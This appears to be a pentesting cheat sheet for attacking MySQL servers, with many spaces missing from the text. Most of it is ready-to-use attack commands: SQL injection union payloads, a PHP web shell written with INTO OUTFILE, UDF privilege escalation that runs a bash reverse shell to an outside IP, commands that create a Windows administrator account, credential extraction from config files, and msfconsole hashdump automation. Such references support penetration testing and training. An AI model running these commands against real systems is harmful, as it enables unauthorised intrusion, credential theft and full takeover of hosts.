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MySQL can be described as an open source Relational Database Management System (RDBMS) that is available at no cost. It operates on the Structured Query Language (SQL), enabling the management and manipulation of databases.
Default port: 3306
3306/tcp open mysql
Connect
Local
mysql-uroot# Connect to root without passwordmysql-uroot-p# A password will be asked (check someone)
showdatabases;use<database>;connect<database>;showtables;describe<table_name>;showcolumnsfrom<table>;selectversion(); #versionselect @@version(); #versionselect user(); #Userselect database(); #database name#Get a shell with the mysql client user\!sh#Basic MySQLiUnionSelect1,2,3,4,group_concat(0x7c,table_name,0x7C) frominformation_schema.tablesUnionSelect1,2,3,4,column_namefrominformation_schema.columnswheretable_name="<TABLE NAME>"#Read & Write## Yo need FILE privilege to read & write to files.select load_file('/var/lib/mysql-files/key.txt'); #Read fileselect 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'#Try to change MySQL root passwordUPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root';FLUSH PRIVILEGES;quit;
mysql-uusername-p<manycommands.sql#A file with all the commands you want to executemysql-uroot-h127.0.0.1-e'show databases;'
MySQL Permissions Enumeration
#MysqlSHOW GRANTS [FOR user];SHOW GRANTS;SHOW GRANTS FOR'root'@'localhost';SHOW GRANTS FORCURRENT_USER();# Get users, permissions & hashesSELECT*FROM mysql.user;#From DBselect*from mysql.user where user='root'; ## Get users with file_privselect user,file_priv from mysql.user where file_priv='Y';## Get users with Super_privselect user,Super_priv from mysql.user where Super_priv='Y';# List functionsSELECT routine_name FROM information_schema.routines WHERE routine_type ='FUNCTION';#@ Functions notfrom sys. dbSELECT routine_name FROM information_schema.routines WHERE routine_type ='FUNCTION'AND routine_schema!='sys';
Actually, when you try to load data local into a table the content of a file the MySQL or MariaDB server asks the client to read it and send the content. Then, if you can tamper a mysql client to connect to your own MySQL server, you can read arbitrary files.
Please notice that this is the behaviour using:
(Notice the "local" word)
Because without the "local" you can get:
mysql> loaddatainfile"/etc/passwd"intotabletestFIELDSTERMINATEDBY'\n';ERROR1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
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In the configuration of MySQL services, various settings are employed to define its operation and security measures:
The user setting is utilized for designating the user under which the MySQL service will be executed.
password is applied for establishing the password associated with the MySQL user.
admin_address specifies the IP address that listens for TCP/IP connections on the administrative network interface.
The debug variable is indicative of the present debugging configurations, including sensitive information within logs.
sql_warnings manages whether information strings are generated for single-row INSERT statements when warnings emerge, containing sensitive data within logs.
With secure_file_priv, the scope of data import and export operations is constrained to enhance security.
Privilege escalation
# Get current user (an all users) privileges and hashesusemysql;selectuser();selectuser,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_privfromuser;# Get users, permissions & credsSELECT*FROMmysql.user;mysql-uroot--password=<PASSWORD>-e"SELECT * FROM mysql.user;"# Create user and give privilegescreateusertestidentifiedby'test';grantSELECT,CREATE,DROP,UPDATE,DELETE,INSERTon*.*tomysqlidentifiedby'mysql'WITHGRANTOPTION;# Get a shell (with your permissions, usefull for sudo/suid privesc)\!sh
Privilege Escalation via library
If the mysql server is running as root (or a different more privileged user) you can make it execute commands. For that, you need to use user defined functions. And to create a user defined you will need a library for the OS that is running mysql.
The malicious library to use can be found inside sqlmap and inside metasploit by doing locate "*lib_mysqludf_sys*". The .so files are linux libraries and the .dll are the Windows ones, choose the one you need.
If you don't have those libraries, you can either look for them, or download this linux C code and compile it inside the linux vulnerable machine:
Now that you have the library, login inside the Mysql as a privileged user (root?) and follow the next steps:
Linux
# Use a databaseuse mysql;# Create a tabletoload the library andmove it to the plugins dircreatetablenpn(line blob);# Load the binary library inside the table## You might need to change the pathandfilenameinsert into npn values(load_file('/tmp/lib_mysqludf_sys.so'));# Get the plugin_dir pathshow variables like'%plugin%';# Supposing the plugin dir was /usr/lib/x86_64-linux-gnu/mariadb19/plugin/# dumpin there the libraryselect*from npn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys.so';# Create a functiontoexecute commandscreatefunctionsys_execreturnsinteger soname 'lib_mysqludf_sys.so';# Execute commandsselect sys_exec('id > /tmp/out.txt; chmod 777 /tmp/out.txt');select sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"');
Windows
# CHech the linux comments for more indicationsUSE mysql;CREATETABLEnpn(line blob);INSERT INTO npn values(load_file('C://temp//lib_mysqludf_sys.dll'));show variables like'%plugin%';SELECT*FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';CREATEFUNCTIONsys_execRETURNSinteger SONAME 'lib_mysqludf_sys_32.dll';SELECT sys_exec("net user npn npn12345678 /add");SELECT sys_exec("net localgroup Administrators npn /add");
Extracting MySQL credentials from files
Inside /etc/mysql/debian.cnf you can find the plain-text password of the user debian-sys-maint
cat/etc/mysql/debian.cnf
You can use these credentials to login in the mysql database.
Inside the file: /var/lib/mysql/mysql/user.MYD you can find all the hashes of the MySQL users (the ones that you can extract from mysql.user inside the database).
Protocol_Name: MySql #Protocol Abbreviation if there is one.
Port_Number: 3306 #Comma separated if there is more than one.
Protocol_Description: MySql #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for MySql
Note: |
MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL).
https://book.hacktricks.xyz/pentesting/pentesting-mysql
Entry_2:
Name: Nmap
Description: Nmap with MySql Scripts
Command: nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse {IP} -p 3306
Entry_3:
Name: MySql
Description: Attempt to connect to mysql server
Command: mysql -h {IP} -u {Username}@localhost
Entry_4:
Name: MySql consolesless mfs enumeration
Description: MySql enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit'
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